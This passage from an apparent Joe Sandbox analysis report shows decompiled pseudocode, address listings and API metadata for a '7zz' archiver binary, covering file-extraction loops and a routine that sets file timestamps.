												L00407A18( *((intOrPtr*)(_t596 - 0x74)));
												E0040B154(_t596 - 0x78);
												_t328 = _t593;
												goto L84;
											} else {
												 *(_t596 - 4) = 0x1a;
												goto L77;
											}
										} else {
											__eflags =  *(_t596 - 0x10);
											if( *(_t596 - 0x10) != 0) {
												goto L73;
											}
											 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
											 *(_t596 - 4) = 0x18;
											goto L77;
										}
									} else {
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										 *(_t596 - 4) = 0x17;
										L77:
										E0040862D();
										 *(_t596 - 4) = 0x11;
										E00408604(_t596 - 0x34);
										 *(_t596 - 4) = 0x10;
										L00407A18( *((intOrPtr*)(_t596 - 0xd4)));
										 *(_t596 - 0x38) =  *(_t596 - 0x38) + 1;
										L0040351A(_t596 - 0xd4);
										_push(_t596 - 0x11);
										 *(_t596 - 4) = 0x11;
										_t368 = L0040B5C9(_t596 - 0xfc);
										__eflags = _t368;
										if(_t368 != 0) {
											continue;
										}
										goto L78;
									}
								}
								 *(_t596 - 4) = 0x14;
								E0040862D();
								 *(_t596 - 4) = 0x12;
								E00408604(_t596 - 0x54);
								 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
								 *(_t596 - 4) = 0x15;
								goto L77;
							}
							__eflags =  *(_t596 - 0x38) - 0xff;
							if( *(_t596 - 0x38) != 0xff) {
								goto L60;
							}
							_t573 =  *( *(_t596 + 0x1c));
							 *(_t596 - 0x10) = _t573;
							asm("cdq");
							asm("cdq");
							_t373 =  *( *(_t596 - 0x10))( *((intOrPtr*)(_t581 + 8)), _t573,  *((intOrPtr*)(_t581 + 0x44)), _t573,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
							__eflags = _t373;
							if(_t373 != 0) {
								_t593 = _t373;
								goto L83;
							}
							_t581 =  *((intOrPtr*)(_t596 + 0x14));
							goto L60;
						}
						goto L79;
					}
					__eflags =  *(_t596 + 0x18);
					if( *(_t596 + 0x18) != 0) {
						goto L53;
					}
					__eflags =  *(_t469 + 0x2c);
					if( *(_t469 + 0x2c) <= 0) {
						L15:
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 !=  *(_t469 + 0x2c)) {
							goto L53;
						}
						E00404AD0(_t596 - 0x68, 1);
						 *((intOrPtr*)(_t596 - 0x68)) = 0x47ab08;
						 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
						 *(_t596 + 0x18) =  *(_t596 + 0x18) & 0x00000000;
						__eflags =  *(_t469 + 0x2c);
						if( *(_t469 + 0x2c) <= 0) {
							L37:
							_t388 = 0;
							__eflags =  *(_t469 + 0x18);
							 *(_t596 + 0x18) = 0;
							if( *(_t469 + 0x18) <= 0) {
								L50:
								 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
								E00408604(_t596 - 0x68);
								goto L80;
							} else {
								goto L38;
							}
							do {
								L38:
								__eflags = _t388 -  *((intOrPtr*)(_t596 - 0x60));
								if(_t388 >=  *((intOrPtr*)(_t596 - 0x60))) {
									L40:
									_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4));
									_push( *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x1c)) + _t388 * 4)) + 4);
									L0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
									 *(_t596 - 4) = 9;
									L0040351A(_t596 - 0x9c);
									_push( *((intOrPtr*)(_t596 - 0x20)));
									 *(_t596 - 4) = 0xa;
									_t393 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags);
									__eflags = _t393;
									if(_t393 != 0) {
										_t395 =  *(_t596 - 0xa4) >> 4;
										__eflags = _t395 & 0x00000001;
										if((_t395 & 0x00000001) != 0) {
											E00405B9F(_t596 - 0x54);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											_push( *((intOrPtr*)(_t596 + 0x24)));
											_push( *((intOrPtr*)(_t596 + 0x20)));
											 *(_t596 - 4) = 0xb;
											_push( *(_t596 + 0x1c));
											_push(0);
											_push( *((intOrPtr*)(_t596 + 0x14)));
											_push(_t596 - 0x54);
											_push( *((intOrPtr*)(_t596 + 0xc)));
											_push(_t596 - 0x9c);
											_push( *((intOrPtr*)(_t596 + 8)));
											_t585 = E00415BCA(_t584,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											 *(_t596 - 4) = 0xc;
											E0040862D();
											 *(_t596 - 4) = 0xa;
											E00408604(_t596 - 0x54);
											__eflags = _t585;
											if(_t585 != 0) {
												L00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_push( *((intOrPtr*)(_t596 - 0x20)));
												L52:
												L00407A18();
												 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
												E00408604(_t596 - 0x68);
												_t328 = _t585;
												goto L84;
											}
											L48:
											L00407A18( *((intOrPtr*)(_t596 - 0x9c)));
											_t170 = _t596 - 4;
											 *_t170 =  *(_t596 - 4) & 0x00000000;
											__eflags =  *_t170;
											L00407A18( *((intOrPtr*)(_t596 - 0x20)));
											goto L49;
										}
										_push(0x80004005);
										L46:
										E00415C6D( *((intOrPtr*)(_t596 + 0x24)));
										_push(_t596 - 0x20);
										L00406796( *((intOrPtr*)(_t596 + 0x20)));
										goto L48;
									}
									_t411 = E00408C9E(_t584);
									__eflags = _t411;
									if(_t411 == 0) {
										goto L48;
									}
									_push(GetLastError());
									goto L46;
								}
								_t532 =  *((intOrPtr*)(_t596 - 0x5c));
								__eflags =  *((char*)(_t532 + _t388));
								if( *((char*)(_t532 + _t388)) == 0) {
									goto L49;
								}
								goto L40;
								L49:
								_t388 =  *(_t596 + 0x18) + 1;
								__eflags = _t388 -  *(_t469 + 0x18);
								 *(_t596 + 0x18) = _t388;
							} while (_t388 <  *(_t469 + 0x18));
							goto L50;
						} else {
							goto L17;
						}
						do {
							L17:
							_t586 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) +  *(_t596 + 0x18) * 4));
							_t415 =  *((intOrPtr*)( *((intOrPtr*)(_t586 + 0xc))));
							_push(_t415);
							 *((intOrPtr*)(_t596 + 0x10)) = _t415;
							L0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
							 *(_t596 - 4) = 1;
							L0040351A(_t596 - 0x9c);
							_push( *((intOrPtr*)(_t596 - 0x20)));
							 *(_t596 - 4) = 2;
							_t418 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags); // executed
							__eflags = _t418;
							if(_t418 != 0) {
								_t473 =  *(_t596 - 0xa4) >> 0x00000004 & 0x00000001;
								__eflags = _t473;
								if(_t473 == 0) {
									__eflags =  *((char*)(_t586 + 0x15));
									if( *((char*)(_t586 + 0x15)) != 0) {
										L21:
										E00405B9F(_t596 - 0x34);
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										_push(_t596 - 0x9c);
										 *(_t596 - 4) = 3;
										_t421 = L00406796(_t596 - 0x34);
										__eflags = _t473;
										_t424 = E00408E8A( *(_t596 - 0x10), 0, _t596 - 0x34, _t421 & 0xffffff00 | _t473 == 0x00000000);
										__eflags = _t424;
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										if(_t424 == 0) {
											 *(_t596 - 4) = 5;
											E0040862D();
											 *(_t596 - 4) = 2;
											E00408604(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0x14)) + 0x3c);
											_push(_t596 - 0xc4);
											E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
											__eflags = _t473;
											if(_t473 == 0) {
												L35:
												L00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_t116 = _t596 - 4;
												 *_t116 =  *(_t596 - 4) & 0x00000000;
												__eflags =  *_t116;
												L00407A18( *((intOrPtr*)(_t596 - 0x20)));
												_t469 =  *(_t596 - 0x10);
												goto L36;
											}
											E00405B9F(_t596 - 0x8c);
											 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
											 *(_t596 - 4) = 6;
											_t587 = E00408B37( *(_t596 - 0x10),  *((intOrPtr*)(_t596 + 0x10)));
											__eflags = _t587;
											if(_t587 < 0) {
												_push( *((intOrPtr*)(_t596 + 0x10)));
												_t588 =  *(_t596 - 0x10);
												L00406796(_t596 - 0x8c);
												L32:
												_push( *((intOrPtr*)(_t596 + 0x24)));
												_push( *((intOrPtr*)(_t596 + 0x20)));
												_push( *(_t596 + 0x1c));
												_push(1);
												_push( *((intOrPtr*)(_t596 + 0x14)));
												_push(_t596 - 0x8c);
												_push( *((intOrPtr*)(_t596 + 0xc)));
												_push(_t596 - 0x9c);
												_push( *((intOrPtr*)(_t596 + 8)));
												_t585 = E00415BCA(_t588,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
												 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
												__eflags = _t585;
												if(_t585 != 0) {
													 *(_t596 - 4) = 7;
													E0040862D();
													 *(_t596 - 4) = 2;
													E00408604(_t596 - 0x8c);
													L00407A18( *((intOrPtr*)(_t596 - 0x9c)));
													_push( *((intOrPtr*)(_t596 - 0x20)));
													goto L52;
												}
												 *(_t596 - 4) = 8;
												E0040862D();
												 *(_t596 - 4) = 2;
												_t555 = _t596 - 0x8c;
												L34:
												E00408604(_t555);
												goto L35;
											}
											__eflags =  *((intOrPtr*)(_t596 - 0x60)) - _t587;
											if(__eflags > 0) {
												L30:
												 *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) =  *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) & 0x00000000;
												_t588 =  *( *((intOrPtr*)( *(_t596 - 0x10) + 0x1c)) + _t587 * 4);
												goto L32;
											}
											_t476 = _t587 -  *((intOrPtr*)(_t596 - 0x60)) + 1;
											__eflags = _t476;
											do {
												L0043AC2F(_t596 - 0x68, 1);
												_t476 = _t476 - 1;
												__eflags = _t476;
											} while (__eflags != 0);
											goto L30;
										}
										 *(_t596 - 4) = 4;
										E0040862D();
										 *(_t596 - 4) = 2;
										_t555 = _t596 - 0x34;
										goto L34;
									}
									L24:
									E00415C6D( *((intOrPtr*)(_t596 + 0x24)), 0x80004005);
									_push(_t596 - 0x20);
									L00406796( *((intOrPtr*)(_t596 + 0x20)));
									goto L35;
								}
								__eflags =  *((char*)(_t586 + 0x16));
								if( *((char*)(_t586 + 0x16)) == 0) {
									goto L24;
								}
								goto L21;
							}
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push(_t596 - 0x20);
							L00406796( *((intOrPtr*)(_t596 + 0x20)));
							L00407A18( *((intOrPtr*)(_t596 - 0x9c)));
							 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
							L00407A18( *((intOrPtr*)(_t596 - 0x20)));
							L36:
							 *(_t596 + 0x18) =  *(_t596 + 0x18) + 1;
							__eflags =  *(_t596 + 0x18) -  *(_t469 + 0x2c);
						} while ( *(_t596 + 0x18) <  *(_t469 + 0x2c));
						goto L37;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_t460 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) + _t590 * 4));
						__eflags =  *((char*)(_t460 + 0x14));
						if( *((char*)(_t460 + 0x14)) != 0) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t460 + 8)) - 1;
						if( *((intOrPtr*)(_t460 + 8)) != 1) {
							goto L15;
						}
						_t564 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0xc))));
						__eflags =  *(_t564 + 4);
						if( *(_t564 + 4) == 0) {
							goto L15;
						}
						_t462 = E00408A3B(_t564);
						__eflags = _t462;
						if(_t462 != 0) {
							goto L15;
						}
						_t590 = _t590 + 1;
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 <  *(_t469 + 0x2c)) {
							continue;
						}
						goto L15;
					}
					goto L15;
				}
				_t581 =  *((intOrPtr*)(_t596 + 0x14));
				_t579 =  *_t568;
				 *(_t596 - 0x38) = _t579;
				asm("cdq");
				asm("cdq");
				_t328 =  *( *(_t596 - 0x38))( *((intOrPtr*)(_t581 + 8)), _t579,  *((intOrPtr*)(_t581 + 0x44)), _t579,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
				if(_t328 == 0) {
					goto L7;
				}
				goto L84;
			}










































                                                                                  0x00415425
                                                                                  0x00415435
                                                                                  0x00415439
                                                                                  0x0041543c
                                                                                  0x0041543f
                                                                                  0x0041544a
                                                                                  0x0041544a
                                                                                  0x0041544e
                                                                                  0x00415453
                                                                                  0x00415482
                                                                                  0x00415485
                                                                                  0x00415485
                                                                                  0x00415488
                                                                                  0x0041548a
                                                                                  0x0041548d
                                                                                  0x004158a9
                                                                                  0x004158ac
                                                                                  0x004158b1
                                                                                  0x004158b6
                                                                                  0x004158ba
                                                                                  0x004158c5
                                                                                  0x004158c9
                                                                                  0x004158d1
                                                                                  0x004158d5
                                                                                  0x004158da
                                                                                  0x004158e5
                                                                                  0x004158f0
                                                                                  0x004158f8
                                                                                  0x004158fc
                                                                                  0x00415901
                                                                                  0x00415903
                                                                                  0x00415b38
                                                                                  0x00415b42
                                                                                  0x00415b4a
                                                                                  0x00415b4d
                                                                                  0x00415b52
                                                                                  0x00415b58
                                                                                  0x00415b5d
                                                                                  0x00415b5d
                                                                                  0x00415b5d
                                                                                  0x00415b65
                                                                                  0x00415b6e
                                                                                  0x00415b73
                                                                                  0x00415b73
                                                                                  0x00415bb9
                                                                                  0x00415bbf
                                                                                  0x00415bc7
                                                                                  0x00415bc7
                                                                                  0x0041590e
                                                                                  0x0041590e
                                                                                  0x00415912
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415918
                                                                                  0x0041591c
                                                                                  0x00415953
                                                                                  0x00415956
                                                                                  0x0041595c
                                                                                  0x0041595f
                                                                                  0x0041596d
                                                                                  0x0041596e
                                                                                  0x00415972
                                                                                  0x0041597d
                                                                                  0x0041597e
                                                                                  0x00415992
                                                                                  0x0041599d
                                                                                  0x004159a2
                                                                                  0x004159a4
                                                                                  0x004159a7
                                                                                  0x004159d0
                                                                                  0x004159d4
                                                                                  0x004159dc
                                                                                  0x004159e0
                                                                                  0x00415a00
                                                                                  0x00415a02
                                                                                  0x00415a0d
                                                                                  0x00415a14
                                                                                  0x00415a15
                                                                                  0x00415a20
                                                                                  0x00415a23
                                                                                  0x00415a25
                                                                                  0x00415a27
                                                                                  0x00415a27
                                                                                  0x00415a25
                                                                                  0x00415a31
                                                                                  0x00415a34
                                                                                  0x00415a36
                                                                                  0x00415a44
                                                                                  0x00415a47
                                                                                  0x00415a4b
                                                                                  0x00415a4f
                                                                                  0x00415a5a
                                                                                  0x00415a5f
                                                                                  0x00415a61
                                                                                  0x00415a69
                                                                                  0x00415a69
                                                                                  0x00415a61
                                                                                  0x00415a6c
                                                                                  0x00415a70
                                                                                  0x00415a81
                                                                                  0x00415a84
                                                                                  0x00415a8c
                                                                                  0x00415a8f
                                                                                  0x00415a94
                                                                                  0x00415a98
                                                                                  0x00415aa3
                                                                                  0x00415aa4
                                                                                  0x00415aa7
                                                                                  0x00415aa7
                                                                                  0x00415aac
                                                                                  0x00415ab8
                                                                                  0x00415abb
                                                                                  0x00415abe
                                                                                  0x00415ac1
                                                                                  0x00415ac2
                                                                                  0x00415ac3
                                                                                  0x00415acc
                                                                                  0x00415acd
                                                                                  0x00415ad0
                                                                                  0x00415ad5
                                                                                  0x00415ad7
                                                                                  0x00415ada
                                                                                  0x00415add
                                                                                  0x00415b7e
                                                                                  0x00415b82
                                                                                  0x00415b8a
                                                                                  0x00415b8e
                                                                                  0x00415b93
                                                                                  0x00415b96
                                                                                  0x00415b9c
                                                                                  0x00415ba4
                                                                                  0x00415ba4
                                                                                  0x00415ba4
                                                                                  0x00415ba8
                                                                                  0x00415bb2
                                                                                  0x00415bb7
                                                                                  0x00000000
                                                                                  0x00415ae3
                                                                                  0x00415ae3
                                                                                  0x00000000
                                                                                  0x00415ae3
                                                                                  0x00415a72
                                                                                  0x00415a72
                                                                                  0x00415a76
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415a78
                                                                                  0x00415a7b
                                                                                  0x00000000
                                                                                  0x00415a7b
                                                                                  0x00415a38
                                                                                  0x00415a38
                                                                                  0x00415a3b
                                                                                  0x00415ae7
                                                                                  0x00415aea
                                                                                  0x00415af2
                                                                                  0x00415af6
                                                                                  0x00415afb
                                                                                  0x00415b05
                                                                                  0x00415b0a
                                                                                  0x00415b14
                                                                                  0x00415b1f
                                                                                  0x00415b27
                                                                                  0x00415b2b
                                                                                  0x00415b30
                                                                                  0x00415b32
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415b32
                                                                                  0x00415a36
                                                                                  0x004159ac
                                                                                  0x004159b0
                                                                                  0x004159b8
                                                                                  0x004159bc
                                                                                  0x004159c1
                                                                                  0x004159c4
                                                                                  0x00000000
                                                                                  0x004159c4
                                                                                  0x0041591e
                                                                                  0x00415922
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041592c
                                                                                  0x00415934
                                                                                  0x00415938
                                                                                  0x00415940
                                                                                  0x00415946
                                                                                  0x00415948
                                                                                  0x0041594a
                                                                                  0x00415b77
                                                                                  0x00000000
                                                                                  0x00415b77
                                                                                  0x00415950
                                                                                  0x00000000
                                                                                  0x00415950
                                                                                  0x00000000
                                                                                  0x0041590e
                                                                                  0x00415493
                                                                                  0x00415497
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041549d
                                                                                  0x004154a0
                                                                                  0x004154ce
                                                                                  0x004154ce
                                                                                  0x004154d1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154dc
                                                                                  0x004154e1
                                                                                  0x004154eb
                                                                                  0x004154ef
                                                                                  0x004154f8
                                                                                  0x004154fa
                                                                                  0x00415723
                                                                                  0x00415723
                                                                                  0x00415725
                                                                                  0x00415728
                                                                                  0x0041572b
                                                                                  0x00415870
                                                                                  0x00415870
                                                                                  0x00415877
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415731
                                                                                  0x00415731
                                                                                  0x00415731
                                                                                  0x00415734
                                                                                  0x00415743
                                                                                  0x00415749
                                                                                  0x00415752
                                                                                  0x00415753
                                                                                  0x0041575e
                                                                                  0x00415762
                                                                                  0x00415767
                                                                                  0x00415770
                                                                                  0x00415774
                                                                                  0x00415779
                                                                                  0x0041577b
                                                                                  0x004157cc
                                                                                  0x004157cf
                                                                                  0x004157d1
                                                                                  0x004157f1
                                                                                  0x004157f6
                                                                                  0x004157f9
                                                                                  0x00415804
                                                                                  0x00415807
                                                                                  0x0041580b
                                                                                  0x0041580e
                                                                                  0x00415810
                                                                                  0x00415813
                                                                                  0x0041581a
                                                                                  0x0041581d
                                                                                  0x0041581e
                                                                                  0x00415826
                                                                                  0x00415828
                                                                                  0x0041582e
                                                                                  0x00415832
                                                                                  0x0041583a
                                                                                  0x0041583e
                                                                                  0x00415843
                                                                                  0x00415845
                                                                                  0x00415887
                                                                                  0x0041588c
                                                                                  0x0041588f
                                                                                  0x0041588f
                                                                                  0x00415894
                                                                                  0x0041589d
                                                                                  0x004158a2
                                                                                  0x00000000
                                                                                  0x004158a2
                                                                                  0x00415847
                                                                                  0x0041584d
                                                                                  0x00415855
                                                                                  0x00415855
                                                                                  0x00415855
                                                                                  0x00415859
                                                                                  0x00000000
                                                                                  0x0041585f
                                                                                  0x004157d3
                                                                                  0x004157d8
                                                                                  0x004157db
                                                                                  0x004157e6
                                                                                  0x004157e7
                                                                                  0x00000000
                                                                                  0x004157e7
                                                                                  0x0041577f
                                                                                  0x00415784
                                                                                  0x00415786
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415792
                                                                                  0x00000000
                                                                                  0x00415792
                                                                                  0x00415736
                                                                                  0x00415739
                                                                                  0x0041573d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415860
                                                                                  0x00415863
                                                                                  0x00415864
                                                                                  0x00415867
                                                                                  0x00415867
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00415500
                                                                                  0x00415500
                                                                                  0x00415509
                                                                                  0x00415512
                                                                                  0x00415514
                                                                                  0x00415515
                                                                                  0x00415518
                                                                                  0x00415523
                                                                                  0x00415527
                                                                                  0x0041552c
                                                                                  0x00415535
                                                                                  0x00415539
                                                                                  0x0041553e
                                                                                  0x00415540
                                                                                  0x00415584
                                                                                  0x00415584
                                                                                  0x00415587
                                                                                  0x004155e0
                                                                                  0x004155e4
                                                                                  0x0041558f
                                                                                  0x00415592
                                                                                  0x00415597
                                                                                  0x004155a3
                                                                                  0x004155a4
                                                                                  0x004155a8
                                                                                  0x004155ad
                                                                                  0x004155bc
                                                                                  0x004155c1
                                                                                  0x004155c3
                                                                                  0x004155c6
                                                                                  0x00415607
                                                                                  0x0041560b
                                                                                  0x00415613
                                                                                  0x00415617
                                                                                  0x00415628
                                                                                  0x0041562f
                                                                                  0x00415630
                                                                                  0x00415635
                                                                                  0x00415637
                                                                                  0x004156f8
                                                                                  0x004156fe
                                                                                  0x00415706
                                                                                  0x00415706
                                                                                  0x00415706
                                                                                  0x0041570a
                                                                                  0x0041570f
                                                                                  0x00000000
                                                                                  0x00415713
                                                                                  0x00415643
                                                                                  0x00415648
                                                                                  0x00415654
                                                                                  0x0041565d
                                                                                  0x0041565f
                                                                                  0x00415661
                                                                                  0x0041568d
                                                                                  0x00415690
                                                                                  0x00415699
                                                                                  0x0041569e
                                                                                  0x0041569e
                                                                                  0x004156ac
                                                                                  0x004156af
                                                                                  0x004156b2
                                                                                  0x004156b4
                                                                                  0x004156b7
                                                                                  0x004156be
                                                                                  0x004156c1
                                                                                  0x004156c2
                                                                                  0x004156ca
                                                                                  0x004156cc
                                                                                  0x004156d2
                                                                                  0x004156d4
                                                                                  0x0041579b
                                                                                  0x0041579f
                                                                                  0x004157aa
                                                                                  0x004157ae
                                                                                  0x004157b9
                                                                                  0x004157be
                                                                                  0x00000000
                                                                                  0x004157be
                                                                                  0x004156e0
                                                                                  0x004156e4
                                                                                  0x004156e9
                                                                                  0x004156ed
                                                                                  0x004156f3
                                                                                  0x004156f3
                                                                                  0x00000000
                                                                                  0x004156f3
                                                                                  0x00415663
                                                                                  0x00415666
                                                                                  0x0041567b
                                                                                  0x0041567e
                                                                                  0x00415688
                                                                                  0x00000000
                                                                                  0x00415688
                                                                                  0x0041566d
                                                                                  0x0041566d
                                                                                  0x0041566e
                                                                                  0x00415673
                                                                                  0x00415678
                                                                                  0x00415678
                                                                                  0x00415678
                                                                                  0x00000000
                                                                                  0x0041566e
                                                                                  0x004155cb
                                                                                  0x004155cf
                                                                                  0x004155d4
                                                                                  0x004155d8
                                                                                  0x00000000
                                                                                  0x004155d8
                                                                                  0x004155e6
                                                                                  0x004155ee
                                                                                  0x004155f9
                                                                                  0x004155fa
                                                                                  0x00000000
                                                                                  0x004155fa
                                                                                  0x00415589
                                                                                  0x0041558d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041558d
                                                                                  0x0041554c
                                                                                  0x00415557
                                                                                  0x00415558
                                                                                  0x00415563
                                                                                  0x0041556b
                                                                                  0x0041556f
                                                                                  0x00415714
                                                                                  0x00415714
                                                                                  0x0041571a
                                                                                  0x0041571a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154a2
                                                                                  0x004154a2
                                                                                  0x004154a5
                                                                                  0x004154a8
                                                                                  0x004154ac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154ae
                                                                                  0x004154b2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154b7
                                                                                  0x004154b9
                                                                                  0x004154bd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154bf
                                                                                  0x004154c4
                                                                                  0x004154c6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154c8
                                                                                  0x004154c9
                                                                                  0x004154cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004154cc
                                                                                  0x00000000
                                                                                  0x004154a2
                                                                                  0x00415458
                                                                                  0x0041545b
                                                                                  0x00415465
                                                                                  0x00415468
                                                                                  0x00415471
                                                                                  0x00415477
                                                                                  0x0041547b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00415425
                                                                                  • GetLastError.KERNEL32(00000000,?,00000001,?,59@,00000000), ref: 00415542
                                                                                  • GetLastError.KERNEL32(?,?,00000000,0000002A,?,59@,00000000), ref: 00415B38
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000001,?,59@,00000000), ref: 0041578C
                                                                                    • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                                    • Part of subcall function 004092A8: __EH_prolog.LIBCMT ref: 004092AD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast
                                                                                  • String ID: 59@
                                                                                  • API String ID: 1057991267-2780377667
                                                                                  • Opcode ID: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                                  • Instruction ID: 1d40638168d81cf388170db04f18bdef8ab4a9340640ae64ab53dda31c2c3f9c
                                                                                  • Opcode Fuzzy Hash: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                                  • Instruction Fuzzy Hash: 6C428D7090424DEFDF11DFA0C981BEDBBB5AF54308F1041AAE84577292DB38AE85CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004098CF Relevance: 9.1, APIs: 6, Instructions: 73filetimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1456 4098cf-4098e9 __EH_prolog 1457 4098fa-409920 CreateFileW 1456->1457 1458 4098eb-4098f5 SetLastError 1456->1458 1460 409922-409948 call 401e9a call 40b863 1457->1460 1461 409965-40996b 1457->1461 1459 409992-40999d 1458->1459 1468 40994a-409959 CreateFileW 1460->1468 1469 40995c-409964 call 407a18 1460->1469 1462 40998d-409991 1461->1462 1463 40996d-409987 SetFileTime CloseHandle 1461->1463 1462->1459 1463->1462 1468->1469 1469->1461
                                                                                  C-Code - Quality: 100%
                                                                                  			E004098CF(WCHAR* __ecx, FILETIME* __edx) {
				void* _t26;
				signed int _t27;
				int _t28;
				signed int _t37;
				void* _t52;

				L0046B890(0x473a10, _t52);
				 *(_t52 - 0x18) = __edx;
				 *((intOrPtr*)(_t52 - 0x14)) = __ecx;
				if( *0x490a7c != 0) {
					_t26 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					 *(_t52 - 0x10) = _t26;
					if(_t26 == 0xffffffff) {
						 *(_t52 - 0x24) = 0;
						 *((intOrPtr*)(_t52 - 0x20)) = 0;
						 *((intOrPtr*)(_t52 - 0x1c)) = 0;
						E00401E9A(_t52 - 0x24, 3);
						 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
						if(L0040B863(_t52 - 0x24) != 0) {
							 *(_t52 - 0x10) = CreateFileW( *(_t52 - 0x24), 0x40000000, 3, 0, 3, 0x2000000, 0);
						}
						L00407A18( *(_t52 - 0x24));
					}
					_t37 = 0;
					if( *(_t52 - 0x10) != 0xffffffff) {
						_t28 = SetFileTime( *(_t52 - 0x10),  *(_t52 - 0x18),  *(_t52 + 8),  *(_t52 + 0xc)); // executed
						_t37 = 0 | _t28 != 0x00000000;
						CloseHandle( *(_t52 - 0x10));
					}
					_t27 = _t37;
				} else {
					SetLastError(0x78);
					_t27 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t27;
			}








                                                                                  0x004098d4
                                                                                  0x004098e3
                                                                                  0x004098e6
                                                                                  0x004098e9
                                                                                  0x00409918
                                                                                  0x0040991d
                                                                                  0x00409920
                                                                                  0x00409929
                                                                                  0x0040992c
                                                                                  0x0040992f
                                                                                  0x00409932
                                                                                  0x0040993a
                                                                                  0x00409948
                                                                                  0x00409959
                                                                                  0x00409959
